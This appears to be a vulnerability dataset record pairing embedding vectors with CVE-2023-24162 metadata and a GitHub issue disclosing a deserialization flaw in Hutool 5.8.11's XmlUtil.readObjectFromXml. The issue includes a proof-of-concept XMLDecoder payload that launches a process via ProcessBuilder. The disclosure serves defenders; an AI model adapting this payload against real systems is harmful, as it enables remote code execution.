0.01337080541998148, -0.019363608211278915, 0.01120552234351635, -0.008486160077154636, 0.00022429725504480302, -0.009339150041341782, 0.010461889207363129, 0.006667176261544228, -0.014960137195885181, 0.02232355810701847, -0.0005513452342711389, 0.011934573762118816, 0.001360592432320118, 0.005307495128363371, -0.005537146236747503, 0.02926412783563137, 0.011577337980270386, 0.00984948594123125, -0.00009625758684705943, 0.019319865852594376, 0.004254015628248453, -0.005580889526754618, -0.007312386762350798, -0.018824109807610512, -0.008216410875320435, 0.004738835152238607, -0.029118318110704422, 0.007184803020209074, 0.0030711295548826456, -0.0024623714853078127, 0.006590625736862421, -0.0014043354894965887, 0.007060864008963108, -0.0069806682877242565, 0.0112419743090868, 0.003665306605398655, -0.002409515203908086, -0.011293007992208004, 0.005974577274173498, -0.00018249070853926241, -0.0031002915930002928, 0.013122927397489548, 0.02238188125193119, -0.008792361244559288, 0.0028250745963305235, -0.012998988851904869, 0.007866466417908669, 0.0005795959732495248, -0.0019374544499441981, -0.007126478478312492, -0.014070694334805012, 0.043626442551612854, 0.0006584246875718236, 0.014420639723539352, -0.0020905551500618458, 0.0017260294407606125, -0.011686695739626884, 0.00044084835099056363, 0.024554455652832985, 0.015339244157075882, 0.0007568466244265437, 0.014318572357296944, -0.012692786753177643, 0.025516804307699203, -0.025268925353884697, 0.009725547395646572, -0.011424237862229347, -0.003384621813893318, -0.007902918383479118, -0.010024458169937134, -0.019567742943763733, 0.00426859688013792, 0.015193433500826359, 0.005610051564872265, -0.022892218083143234, -0.01902824454009533, 0.026420827955007553, -0.0031440346501767635, -0.022192329168319702, 0.004122786223888397, 0.02922038547694683, -0.01805131509900093, -0.004166529513895512, -0.010104654356837273, 0.025575127452611923, -0.0027813315391540527, -0.0007149261655285954, -0.012444909662008286, 0.013050022535026073, 0.003842101665213704, 0.01329060923308134, -0.008508031256496906, -0.004706027451902628, 0.010520213283598423, 0.0021069590002298355, -0.008318478241562843, -0.022250652313232422, -0.009477670304477215, -0.00034948906977660954, 0.007669622078537941, 0.012554267421364784, -0.005624632351100445, -0.013334352523088455, 0.01122739352285862, -0.0043159849010407925, 0.007968532852828503, -0.002599068684503436, -0.009317278861999512, -0.025473060086369514, 0.00708638085052371, -0.031582511961460114, -0.010002586990594864, 0.0030255638994276524, 0.0014681274769827724, -0.007815432734787464, 0.015018461272120476, -0.0031567930709570646, -0.010629571042954922, 0.0004030287964269519, 0.0025188729632645845, 0.007232191041111946, -0.038435596972703934, -0.005839702673256397, -0.03295312821865082, 0.013523905538022518, -0.01035982184112072, 0.000784641713835299, 0.0045274100266397, 0.010141106322407722, 0.0043014041148126125, 0.016374496743083, -0.020865455269813538, 0.01418005209416151, -0.0028870441019535065, -0.03945627063512802, 0.015616283752024174, 0.0022618824150413275, -0.016097458079457283, 0.0056829568929970264, 0.0007791738025844097, -0.0033153619151562452, 0.010549375787377357, -0.0035851108841598034, 0.003362750168889761, -0.0022527691908180714, -0.012182450853288174, 0.011176359839737415, -0.004819030407816172, 0.0038311658427119255, -0.008398673497140408, 0.0309409461915493, 0.0020249406807124615, -0.009229792281985283, 0.0242190919816494, -0.003955104388296604, -0.005719409324228764, 0.004870064090937376, 0.020442605018615723, 0.002358481753617525, -0.023067191243171692, 0.02141953445971012, -0.008500740863382816, 0.001740610576234758, 0.00011824304237961769, -0.004899226129055023, 0.014420639723539352, -0.016126619651913643, 0.0276164710521698, 0.002342078136280179, 0.01341454777866602, -0.007370710838586092, -0.000011868446563312318, -0.01073892880231142, -0.005394981242716312, -0.005117941647768021, 0.006732790730893612, -0.014012370258569717, -0.009120434522628784, 0.016082877293229103, -0.002794089959934354, -0.01251052413135767, -0.0006438436103053391, 0.007188448216766119, 0.003816584823653102, 0.002885221503674984, -0.01825544983148575, 0.027179041877388954, -0.027762282639741898, -0.003322652308270335, -0.011183650232851505, -0.003893135115504265, -0.0027521695010364056, -0.030532678589224815, 0.011329460889101028, -0.019130311906337738, 0.006011029705405235, -0.00992968212813139, -0.00852990336716175, -0.015091367065906525, 0.009295406751334667, 0.015674607828259468, -0.02071964368224144, 0.0008602808229625225, 0.0007727946504019201, 0.02491898089647293, -0.01983020082116127, -0.010862867347896099, 0.0005308406543917954, 0.0018681945512071252, 0.011796053498983383, 0.0026573927607387304, -0.0032953128684312105, -0.008909009397029877, -0.013436419889330864, -0.044413819909095764, 0.023650432005524635, 0.013363514095544815, 0.0072868699207901955, 0.01070247683674097, 0.00907669123262167, -0.008923591114580631, 0.012379295192658901, -0.015660027042031288, -0.007647750433534384, 0.003823875216767192, -0.028943344950675964, -0.006608852185308933, -0.001585687045007944, -0.021725734695792198, -0.006087580230087042, 0.01797841116786003, 0.025181440636515617, -0.03027021884918213, 0.01723477803170681, 0.010046330280601978, -0.008828814141452312, -0.008712165988981724, -0.010286916978657246, 0.01081912498921156, 0.005533501040190458, -0.003816584823653102, 0.029774464666843414, -0.010542085394263268, 0.0259542353451252, 0.013363514095544815, 0.003346346551552415, 0.003907716367393732, -0.00248424313031137, -0.006072999443858862, 0.047767456620931625, 0.000567748851608485, 0.023519203066825867, -0.028199713677167892, 0.011584628373384476, -0.0011382317170500755, -0.011504433117806911, 0.014216504991054535, 0.0141873424872756, 0.00944850780069828, 0.017657628282904625, -0.020967522636055946, 0.011395075358450413, -0.005373109597712755, -0.03201994299888611, 0.007348839193582535, -0.015951648354530334, -0.0007696050452068448, -0.011293007992208004, 0.012853178195655346, -0.011526304297149181, 0.00452011963352561, -0.025706356391310692, 0.03957291692495346, 0.007509230636060238, 0.004585734102874994, -0.023081772029399872, 0.03178664669394493, -0.01638907752931118, 0.006233390420675278, 0.024627361446619034, -0.008063309825956821, 0.011548176407814026, -0.003422896843403578, 0.011263846419751644, -0.009762000292539597, -0.001953858183696866, 0.006083935033529997, -0.009280825965106487, -0.014464382082223892, -0.007932080887258053, 0.003379153786227107, 0.005405917298048735, 0.016141200438141823, 0.018488746136426926, 0.0124886529520154, -0.008887138217687607, 0.000011612139132921584, 0.014945556409657001, 0.0001740610459819436, -0.007031701970845461, -0.0018317420035600662, -0.006696338299661875, -0.01802215352654457, -0.007822723127901554, 0.023650432005524635, -0.0008261065231636167, -0.0031112274155020714, 0.00353954522870481, -0.003690823446959257, 0.001839032513089478, -0.0010981338564306498, 0.005096070002764463, -0.00866113230586052, 0.0060365465469658375, -0.01328331883996725, -0.022542273625731468, -0.012474071234464645, -0.01732226461172104, 0.000055988879466895014, -0.0005659262533299625, 0.005708473268896341, -0.03126173093914986, 0.020253051072359085, -0.006842148490250111, -0.0002378530625719577, -0.02408786304295063, 0.0012594364816322923, -0.006247971672564745, -0.02150702103972435, 0.0004066740511916578, -0.00407175300642848, -0.017774276435375214, 0.01638907752931118, 0.0036416123621165752, -0.01122010312974453, 0.006525011267513037, 0.008004985749721527, -0.008712165988981724, -0.011555466800928116, 0.010775381699204445, -0.0021106041967868805, -0.0003212383307982236, 0.004192046355456114, 0.00992968212813139, -0.010760800912976265, -0.0041410126723349094, -0.020369699224829674, -0.008435126394033432, 0.006656240671873093, 0.03099927119910717, -0.0028433010447770357, 0.002128830412402749, -0.02924954704940319, -0.024627361446619034, 0.006083935033529997, 0.014566449448466301, 0.004727899096906185, -0.002520695561543107, 0.0310867577791214, -0.003656193381175399, 0.004352437797933817, -0.01419463288038969, 0.025706356391310692, 0.021113332360982895, 0.0052491710521280766, -0.002230897778645158, 0.001573840039782226, -0.013363514095544815, 0.013101056218147278, 0.02328590676188469, 0.008836104534566402, 0.0003100747417192906, 0.020938359200954437, -0.01716187223792076, 0.01081183459609747, 0.004367018584161997, -0.001156457932665944, 0.011314880102872849, -0.023810822516679764, 0.006182357203215361, -0.006656240671873093, -0.009244373068213463, 0.015732932835817337, -0.0007244949811138213, -0.01327602844685316, 0.020048916339874268, 0.004735189490020275, -0.005271042697131634, 0.004184755962342024, 0.02681451477110386, 0.009361021220684052, 0.026172950863838196, 0.013487453572452068, -0.016374496743083, -0.012299099005758762, 0.015951648354530334, 0.004531055223196745, 0.008522612042725086, -0.0086757130920887, -0.013924884609878063, 0.015645446255803108, -0.0005094247753731906, -0.015018461272120476, 0.005945415236055851, -0.00993697252124548, 0.008617389015853405, 0.0077425274066627026, -0.022192329168319702, -0.027135297656059265, 0.01638907752931118, 0.005978222470730543, -0.004625831730663776, 0.013502034358680248, 0.008201830089092255, 0.006550528109073639, 0.0068129864521324635, 0.010651443153619766, -0.0077643985860049725, -0.003947813995182514, 0.0060365465469658375, -0.01966981031000614, -0.014537287876009941, 0.01071705762296915, 0.0011391430161893368, 0.009317278861999512, -0.007604007609188557, -0.00690411776304245, 0.008996495977044106, -0.010862867347896099, -0.006419298704713583, -0.01213141717016697, 0.021302886307239532, 0.005650149192661047, 0.0022746408358216286, 0.010943063534796238, -0.006922344211488962, 0.03359469398856163, 0.0018381212139502168, -0.014909103512763977, 0.007516521494835615, 0.029059993103146553, 0.0018681945512071252, 0.008092472329735756, -0.002201735507696867, 0.0020705063361674547, -0.0073379036039114, -0.013574939221143723, -0.02509395405650139, -0.002272818237543106, -0.008777780458331108, -0.014537287876009941, 0.003346346551552415, -0.01290421187877655, 0.01815338246524334, -0.008617389015853405, -0.00941934622824192, 0.0015273629687726498, -0.00670727388933301, 0.005110651254653931, 0.0023858211934566498, 0.00995155330747366, -0.020034335553646088, 0.001054390799254179, 0.003171374090015888, -0.010760800912976265, -0.00995884370058775, 0.0216528307646513, 0.025385573506355286, -0.0011546353343874216, 0.012226194143295288, -0.0030328542925417423, -0.010286916978657246, 0.0018809529719874263, 0.005657440051436424, 0.007042637560516596, 0.0001401145855197683, -0.0013569471193477511, -0.0032424565870314837, 0.012204322963953018, 0.00246054888702929, -0.009200630709528923, 0.03292396664619446, -0.01557254046201706, -0.0015419439878314734, 0.0028833989053964615, 0.007308741565793753, -0.008012276142835617, 0.005318430718034506, 0.00018180721963290125, -0.010607699863612652, 0.001908292411826551, -0.011511723510921001, 0.007432680577039719, -0.02334422990679741, -0.0022381881717592478, 0.02418993040919304, 0.011438818648457527, -0.005974577274173498, 0.0009113143896684051, -0.00866113230586052, -0.0009208832052536309, 0.02856423892080784, -0.01200747862458229, 0.004585734102874994, 0.020078079774975777, 0.017482655122876167, -0.007487358991056681, -0.0050851344130933285, -0.003514028387144208, -0.00013498844054993242, 0.011934573762118816, 0.0012767515145242214, -0.01074621919542551, -0.013742621056735516, 0.0012539686867967248, -0.00814350601285696, -0.016520308330655098, 0.020413443446159363, 0.020092660561203957, 0.005887091159820557, 0.010243173688650131, -0.015149691142141819, 0.011314880102872849, 0.01716187223792076, 0.020267631858587265, 0.013101056218147278, -0.021127913147211075, 0.01805131509900093, -0.021025845780968666, 0.036627549678087234, 0.008631969802081585, 0.012430328875780106, -0.026129206642508507, -0.020894616842269897, -0.007983114570379257, -0.01466851681470871, -0.009601608850061893, -0.027004068717360497, -0.00453470041975379, -0.01378636434674263, 0.004170174710452557, 0.017657628282904625, 0.008340349420905113, 0.007494649849832058, 0.010469179600477219, -0.002194445114582777, -0.004593024495989084, 0.002553503029048443, 0.013830107636749744, -0.0038566826842725277, 0.0022181393578648567, 0.003236988792195916, 0.014909103512763977, 0.0014845312107354403, 0.0036306765396147966, -0.0285934004932642, 0.001561081619001925, -0.0019101150101050735, 0.0035687072668224573, -0.0008115255041047931, 0.0002610915689729154, -0.019130311906337738, -0.02057383395731449, 0.012444909662008286, 0.02663954347372055, -0.008267444558441639, 0.008464287966489792, 0.008048729039728642, -0.00644117034971714, -0.010104654356837273, -0.016724441200494766, 0.010367113165557384, -0.016009971499443054, 0.009186048991978168, 0.004403471015393734, 0.008296606130897999, -0.01073892880231142, 0.0015164271462708712, 0.010877449065446854, -0.001642188522964716, 0.00010257982648909092, -0.0019465675577521324, 0.0010789962252601981, 0.017774276435375214, 0.020384280011057854, -0.002770395716652274, 0.01327602844685316, -0.00492838816717267, -0.0047898683696985245, 0.007567554712295532, -0.01806589774787426, -0.03723995387554169, -0.0009117700974456966, 0.012714658863842487, 0.011118035763502121, -0.0036999364383518696, 0.0015064027393236756, -0.018415842205286026, 0.007881047204136848, -0.014420639723539352, 0.011817925609648228, 0.0031877777073532343, -0.0017005127156153321, 0.023679593577980995, 0.015937065705657005, 0.0049575502052903175, 0.014107147231698036, -0.009484960697591305, 0.010527503676712513, 0.008442416787147522, 0.007793561089783907, -0.004166529513895512, 0.020880036056041718, -0.006350039038807154, -0.00670727388933301, -0.0016121151857078075, -0.0036416123621165752, -0.0011546353343874216, 0.01544131152331829, 0.0011054243659600616, 0.0008320300839841366, 0.015893323346972466, 0.004950259812176228, -0.006667176261544228, -0.010695185512304306, -0.001654946943745017, 0.02576468139886856, 0.02854965813457966, 0.00029116496443748474, 0.0028943344950675964, 0.015397568233311176, 0.000490287144202739, -0.003648902988061309, -0.001037987065501511, 0.014012370258569717, -0.019990593194961548, -0.009178758598864079, -0.023519203066825867, -0.016199525445699692, 0.028214294463396072, 0.010760800912976265, -0.0006771066109649837, -0.029730722308158875, -0.003461172105744481, -0.011693986132740974, -0.028170550242066383, 0.02404411882162094, -0.0016704392619431019, -0.00013407712685875595, 0.0046003153547644615, 0.01252510491758585, -0.0068166316486895084, 0.02503562904894352, 0.01723477803170681, -0.005923543591052294, 0.0017296747537329793, -0.008522612042725086, 0.01290421187877655, 0.015922484919428825, -0.004501893185079098, -0.011752310208976269, -0.004501893185079098, 0.02592507191002369, -0.00407904339954257, 0.005449660122394562, -0.004669575020670891, 0.0046039605513215065, -0.005438724532723427, 0.0031112274155020714, -0.005023165140300989, -0.0022491239942610264, -0.00953599438071251, 0.02053009159862995, -0.021361209452152252, 0.0008179047144949436, -0.014092566445469856, 0.0030510807409882545, -0.008930881507694721, -0.005245525855571032, -0.03280732035636902, -0.0030018696561455727, -0.010979516431689262, 0.00008332831203006208, 0.007720655761659145, 0.015834998339414597, 0.005066907964646816, -0.005271042697131634, -0.01977187767624855, -0.003466640133410692, 0.0013013569405302405, 0.012969826348125935, 0.003089355770498514, 0.002717539668083191, -0.022061100229620934, 0.028841279447078705, 0.018532490357756615, -0.007604007609188557, 0.019334446638822556, -0.02055925317108631, -0.00944850780069828, 0.0240003764629364, 0.00517991092056036, 0.008070600219070911, -0.0010844641365110874, 0.008362220600247383, -0.01081183459609747, -0.001964793773368001, -0.00778627023100853, 0.015937065705657005, -0.003853037254884839, -0.005898026749491692, 0.002983643440529704, -0.014712260104715824, 0.003198713529855013, 0.0138082355260849, 0.0077643985860049725, -0.022061100229620934, -0.006608852185308933, 0.012787563726305962, 0.015703769400715828, 0.01199289783835411, 0.004593024495989084, 0.005023165140300989, -0.015193433500826359, -0.007257707882672548, -0.02677077241241932, -0.0037582607474178076, -0.02318383939564228, -0.0074545517563819885, 0.002075974131003022, -0.021259142085909843, -0.005504339002072811, -0.007552973926067352, 0.022031936794519424, -0.017526399344205856, -0.030678488314151764, -0.00908398162573576, 0.008464287966489792, 0.007297805976122618, -0.010374403558671474, 0.0003150869451928884, 0.011861667968332767, 0.01159191969782114, -0.003543190425261855, -0.00009637149923946708, 0.012051221914589405, -0.005343947559595108, 0.029832787811756134, -0.014785164967179298, -0.004111850634217262, 0.006003739312291145, 0.005876155104488134, -0.006426589097827673, 0.004082688596099615, -0.0028214293997734785, 0.016053713858127594, -0.007720655761659145, 0.0072722891345620155, -0.009871358051896095, 0.03333223611116409, 0.004068107344210148, 0.03161167353391647, 0.013050022535026073, -0.014974717982113361, -0.014303990639746189, 0.005617341957986355, 0.007319677155464888, -0.0005549904890358448, -0.008821523748338223, -0.006171421147882938, 0.003481221152469516, 0.013181251473724842, -0.00032169398036785424, 0.04808823764324188, 0.000892632466275245, 0.004691446665674448, 0.009601608850061893, -0.0138082355260849, -0.02168199233710766, -0.012670915573835373, 0.008464287966489792, -0.02157992497086525, -0.0052637518383562565, 0.006907763425260782, -0.02586674876511097, 0.007604007609188557, -0.0005394981126300991, 0.004950259812176228, -0.007888337597250938, 0.00907669123262167, 0.0034921567421406507, 0.0027157168369740248, -0.013684296980500221, 0.00560640636831522, -0.012073093093931675, 0.0214341152459383, 0.01250323373824358, -0.019290704280138016, 0.004228498786687851, 0.00944121740758419, -0.028068484738469124, 0.0033153619151562452, -0.028607981279492378, 0.023883728310465813, -0.0004907427937723696, 0.031495027244091034, -0.00903294887393713, 0.006149549502879381, -0.00216528307646513, 0.000625161686912179, 0.027791444212198257, -0.02076338790357113, -0.011460689827799797, 0.015732932835817337, 0.005117941647768021, -0.028170550242066383, 0.007509230636060238, -0.0041300770826637745, 0.006091225426644087, -0.007009830325841904, -0.002181686693802476, 0.013647845014929771, 0.000976929091848433, 0.005030455533415079, -0.0031640836969017982, 0.009222501888871193, 0.007399872876703739, 0.00600738450884819, 0.007213965058326721, -0.007596716750413179, -0.007049928419291973, 0.0038603278808295727, -0.008012276142835617, -0.00869029387831688, -0.02328590676188469, -0.00032761754118837416, -0.004122786223888397, -0.00012997622252441943, -0.007567554712295532, 0.0007345193880610168, 0.02080713026225567, 0.003922297153621912, 0.02856423892080784, -0.009295406751334667, -0.016870252788066864, -0.011941864155232906, 0.0029034477192908525, -0.0011673937551677227, -0.02919122390449047, 0.011387784965336323, -0.004706027451902628, 0.003501269966363907, -0.002655570162460208, 0.019305285066366196, -0.007254062686115503, 0.010279626585543156, -0.00707909045740962, -0.01329789962619543, 0.00777168944478035, -0.017001481726765633, -0.0015492344973608851, -0.012947955168783665, -0.008267444558441639, 0.02163824997842312, 0.011285717599093914, 0.00006886119808768854, -0.009244373068213463, -0.002938077552244067, -0.013137508183717728, 0.00007524039392592385, 0.0009154153522104025, 0.01298440806567669, 0.002382175764068961, -0.0004852749116253108, 0.001802579965442419, -0.017497235909104347, 0.006419298704713583, -0.001123650697991252, -0.0026920228265225887, -0.01159921009093523, -0.007611298002302647, -0.018576232716441154, -0.0056829568929970264, 0.014427930116653442, 0.008318478241562843, -0.0070936712436378, 0.004443569108843803, 0.007064509205520153, -0.0036434349603950977, 0.004665929824113846, -0.0031640836969017982, 0.011015968397259712, 0.014770584180951118, -0.014121728017926216, 0.015280920080840588, 0.008238282054662704, -0.002664683386683464, 0.014828908257186413, -0.000649767171125859, -0.0019884880166500807, 0.005198137369006872, -0.009229792281985283, 0.022542273625731468, 0.005836057476699352, -0.00855906493961811, 0.018284613266587257, 0.019130311906337738, 0.011861667968332767, 0.011548176407814026, 0.003973330836743116, 0.013480163179337978, 0.011482561938464642, 0.01904282532632351, 0.012058512307703495, 0.054620541632175446, 0.008865267038345337, 0.015601702965795994, -0.013655135408043861, 0.0005773176671937108, 0.0035504810512065887, -0.016097458079457283, 0.007192093413323164, 0.00030620163306593895, 0.00819453876465559, 0.02149243839085102, 0.018430422991514206, -0.0052564614452421665, 0.00334999174810946, 0.04298487678170204, -0.007064509205520153, 0.016607793048024178, -0.00815079640597105, -0.0016002680640667677, 0.00030620163306593895, 0.009514122270047665, 0.00517262052744627, 0.0005381311639212072, -0.0031768421176820993, 0.0016476564342156053, 0.011365913785994053, 0.007713365368545055, 0.016636956483125687, -0.010549375787377357, -0.011037840507924557, -0.009280825965106487, 0.007020766381174326, 0.006211519241333008, 0.023592106997966766, 0.016534889116883278, 0.018357517197728157, 0.00817266758531332, 0.01072434801608324, 0.004873709287494421, -0.0011418769136071205, 0.015382987447082996, -0.026493731886148453, 0.011781472712755203, 0.0011628371430560946, 0.0002895701618399471, -0.011730439029633999, -0.0052564614452421665, -0.014974717982113361, 0.007917499169707298, 0.0035978693049401045, -0.013538487255573273, 0.0141873424872756, -0.02592507191002369, 0.0009878647979348898, 0.01330519001930952, -0.00040166181861422956, -0.00003491473398753442, 0.01805131509900093, 0.00816537719219923, 0.005686602089554071, -0.011387784965336323, 0.0016412772238254547, 0.00777897983789444 ]
CVE-2023-24162
2023-01-31T16:15:09.220000
Deserialization vulnerability in Dromara Hutool v5.8.11 allows attacker to execute arbitrary code via the XmlUtil.readObjectFromXml parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gitee.com/dromara/hutool/issues/I6AEX2" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/dromara/hutool/issues/2855" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hutool:hutool:5.8.11:*:*:*:*:*:*:*", "matchCriteriaId": "A354824B-591F-4F37-8681-734B7CDE00AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/dromara/hutool/issues/2855
[ "Exploit", "Third Party Advisory" ]
github.com
[ "dromara", "hutool" ]
### Desc Hutool provides XML utility classes that may be vulnerable to remote code execution when using XmlUtil.readObjectFromXml to interpret untrusted XML strings ### Detailed The program will call XMLDecoder.readObject to parse the XML string, causing a deserialization vulnerability *cn.hutool.core.util.XmlUtil#readObjectFromXml* ![image](https://user-images.githubusercontent.com/50647385/212257301-e7534834-f1bd-4088-a475-447ec2c4a697.png) ### Attack ```java XmlUtil.readObjectFromXml("<java>\n" + " <object class=\"java.lang.ProcessBuilder\">\n" + " <array class=\"java.lang.String\" length=\"1\">\n" + " <void index=\"0\">\n" + " <string>calc</string>\n" + " </void>\n" + " </array>\n" + " <void method=\"start\"></void>\n" + " </object>\n" + "</java>\n"); ``` ![image](https://user-images.githubusercontent.com/50647385/212257507-8a499ded-8268-42cf-aa24-a0b92e901840.png)
XmlUtil Deserialization vulnerability
https://api.github.com/repos/dromara/hutool/issues/2855/comments
1
2023-01-13T07:01:40
2023-01-15T03:03:37Z
https://github.com/dromara/hutool/issues/2855
1,531,809,515
2,855
true
This is a GitHub Issue repo:hutool owner:dromara Title : XmlUtil Deserialization vulnerability Issue date: --- start body --- ### Desc Hutool provides XML utility classes that may be vulnerable to remote code execution when using XmlUtil.readObjectFromXml to interpret untrusted XML strings ### Detailed The program will call XMLDecoder.readObject to parse the XML string, causing a deserialization vulnerability *cn.hutool.core.util.XmlUtil#readObjectFromXml* ![image](https://user-images.githubusercontent.com/50647385/212257301-e7534834-f1bd-4088-a475-447ec2c4a697.png) ### Attack ```java XmlUtil.readObjectFromXml("<java>\n" + " <object class=\"java.lang.ProcessBuilder\">\n" + " <array class=\"java.lang.String\" length=\"1\">\n" + " <void index=\"0\">\n" + " <string>calc</string>\n" + " </void>\n" + " </array>\n" + " <void method=\"start\"></void>\n" + " </object>\n" + "</java>\n"); ``` ![image](https://user-images.githubusercontent.com/50647385/212257507-8a499ded-8268-42cf-aa24-a0b92e901840.png) --- end body ---
1,197
[ -0.016193769872188568, -0.012976046651601791, -0.00767626753076911, 0.005769468378275633, 0.051567692309617996, 0.026288587599992752, 0.01381027139723301, 0.02752239815890789, -0.00021107544307596982, 0.047782134264707565, 0.023021791130304337, 0.024395808577537537, -0.0025815393310040236, 0.01227501779794693, 0.020049428567290306, 0.04828687757253647, -0.026190442964434624, -0.006828022189438343, -0.030284453183412552, -0.009653168730437756, -0.04680069535970688, -0.019096029922366142, -0.03928566351532936, 0.03861267492175102, -0.004290297627449036, 0.02181602269411087, -0.01455336157232523, -0.020848602056503296, 0.022797463461756706, 0.006221632473170757, -0.00023068235896062106, -0.01905396766960621, 0.008019771426916122, 0.02205437235534191, 0.037855565547943115, 0.028938475996255875, 0.024353746324777603, 0.03754711151123047, -0.04374421015381813, -0.02638673037290573, -0.018128609284758568, -0.055661700665950775, -0.020876644179224968, 0.030985482037067413, -0.0019067988032475114, -0.010858939029276371, -0.0410802997648716, -0.0036067941691726446, -0.054287683218717575, 0.05493263155221939, 0.02098880708217621, -0.01634799689054489, -0.031237851828336716, -0.027256006374955177, 0.02806919999420643, 0.01112532988190651, 0.015618925914168358, 0.0029092703480273485, -0.019726956263184547, -0.016390057280659676, -0.016922838985919952, 0.016838716343045235, 0.038640718907117844, 0.033957842737436295, -0.0047564818523824215, 0.027592500671744347, 0.0030547338537871838, 0.03550010919570923, 0.008748841471970081, 0.03920154273509979, 0.016390057280659676, -0.0017709744861349463, -0.006389879155904055, -0.002744528464972973, 0.024339726194739342, 0.012870891951024532, 0.02397519163787365, -0.006926166359335184, -0.017161190509796143, 0.030677028000354767, -0.015492741018533707, 0.01427295058965683, -0.0397062823176384, -0.01062759943306446, 0.017063045874238014, -0.018927782773971558, -0.05734417214989662, -0.0754307210445404, -0.008538533002138138, -0.032471664249897, -0.010438322089612484, 0.027354151010513306, 0.007669257000088692, -0.011875431053340435, 0.007732349913567305, 0.018913762643933296, -0.0033456608653068542, -0.03880896419286728, -0.06662579625844955, 0.04713718965649605, -0.019222214818000793, 0.0019348399946466088, -0.015604905784130096, -0.0061760651879012585, 0.024718282744288445, -0.010515434667468071, -0.01564696617424488, -0.003764525754377246, 0.0016404078342020512, 0.11552957445383072, 0.007522040978074074, 0.0007982967654243112, 0.006067405920475721, -0.024914570152759552, 0.014483259059488773, 0.042650602757930756, -0.017567787319421768, -0.041164420545101166, -0.05961550399661064, -0.00684905331581831, -0.03390176221728325, 0.011041206307709217, -0.00019409740343689919, -0.01085192896425724, -0.0520724318921566, 0.016740571707487106, -0.026078278198838234, 0.011742235161364079, 0.002891744486987591, 0.0015685523394495249, -0.057484377175569534, -0.0021679322235286236, 0.011223474517464638, 0.016950881108641624, 0.015913357958197594, -0.0026323639322072268, 0.016586346551775932, 0.031153729185461998, 0.004279782064259052, 0.015394596382975578, -0.05613839998841286, -0.02376488223671913, -0.028125282377004623, -0.02202633023262024, -0.05425964295864105, 0.012520377524197102, -0.020624272525310516, 0.009001212194561958, -0.022334784269332886, -0.021171076223254204, -0.014293980784714222, -0.050193674862384796, -0.020147573202848434, 0.05866210535168648, 0.010024714283645153, 0.020049428567290306, 0.008636676706373692, 0.05226872116327286, -0.04783821851015091, -0.005629262886941433, 0.012723675929009914, -0.017665930092334747, 0.011644091457128525, -0.029303012415766716, -0.016936860978603363, -0.049268316477537155, 0.008335234597325325, 0.032836198806762695, -0.05728808790445328, 0.016165727749466896, -0.01896984502673149, -0.024269623681902885, 0.021395403891801834, 0.03575247898697853, -0.039425868541002274, 0.009232551790773869, 0.020259737968444824, -0.007648226339370012, -0.02955538220703602, -0.032724034041166306, -0.032471664249897, 0.0048406049609184265, 0.018086547031998634, 0.0050123571418225765, 0.006463487166911364, -0.021381383761763573, 0.02899455837905407, -0.005103491246700287, 0.01962881162762642, -0.02696157433092594, -0.05072645843029022, -0.011377700604498386, -0.020820561796426773, -0.012646563351154327, 0.015843255445361137, -0.026877451688051224, -0.036930207163095474, -0.039005253463983536, 0.005114006344228983, -0.007493999786674976, -0.003708443371579051, -0.007949668914079666, -0.04110834002494812, 0.005972766783088446, -0.06690620630979538, -0.0030547338537871838, -0.011903472244739532, 0.008706780150532722, 0.020484067499637604, -0.026568999513983727, -0.009281624108552933, -0.01665644906461239, -0.0017832424491643906, -0.006470497697591782, 0.008258121088147163, 0.010592548176646233, 0.022895606234669685, -0.01758180744946003, -0.0749259814620018, -0.03435042127966881, 0.017077066004276276, -0.020399942994117737, 0.02271333895623684, -0.022573133930563927, -0.025741783902049065, -0.030116206035017967, -0.00731173250824213, 0.012120790779590607, 0.004518131725490093, 0.0015080886660143733, 0.03336897864937782, 0.00361029920168221, 0.017525725066661835, -0.009484922513365746, 0.0015299958176910877, -0.01962881162762642, 0.024830447509884834, 0.024746323004364967, -0.007248639594763517, 0.002986383391544223, 0.021984269842505455, -0.0026165908202528954, 0.013550890609622002, -0.013165323995053768, 0.017497682943940163, 0.030536822974681854, 0.01804448664188385, 0.001503707142546773, 0.0015527792274951935, 0.023568594828248024, 0.014917897060513496, -0.02261519432067871, 0.042987097054719925, 0.0009122139890678227, -0.020287778228521347, -0.01599748246371746, 0.028475796803832054, 0.03451866656541824, -0.01204367820173502, 0.018212733790278435, 0.006442456506192684, 0.020399942994117737, -0.01512820553034544, 0.01962881162762642, 0.0014257177244871855, -0.00733276316896081, 0.014336043037474155, -0.01678263396024704, -0.005569675471633673, -0.005121016874909401, 0.06303652375936508, -0.02009149082005024, -0.023428387939929962, -0.006477507762610912, -0.022909628227353096, -0.03401392698287964, -0.014455217868089676, 0.016544284299016, 0.019923243671655655, -0.005573180504143238, -0.009639148600399494, -0.006477507762610912, 0.014945938251912594, 0.006824517156928778, 0.0011987595353275537, -0.014497279189527035, 0.009632138535380363, 0.017609847709536552, -0.04262256249785423, -0.008426368236541748, -0.003655866254121065, 0.0260362159460783, -0.046071626245975494, -0.006277714390307665, -0.01953066699206829, 0.03084527514874935, -0.00884698610752821, 0.01158800907433033, -0.029975999146699905, -0.014595423825085163, -0.040603600442409515, 0.0224749892950058, 0.021886125206947327, 0.02638673037290573, -0.006211116909980774, -0.00035730571835301816, 0.035331860184669495, 0.032724034041166306, 0.0032895784825086594, -0.01451130025088787, 0.05389510840177536, -0.02752239815890789, -0.03118176944553852, -0.03709845244884491, -0.017049025744199753, -0.02020365558564663, 0.009884508326649666, 0.0006326786824502051, 0.025096837431192398, 0.040154941380023956, -0.040715765208005905, -0.007227608934044838, -0.04724935442209244, -0.012688624672591686, 0.05866210535168648, 0.019124070182442665, -0.04775409400463104, 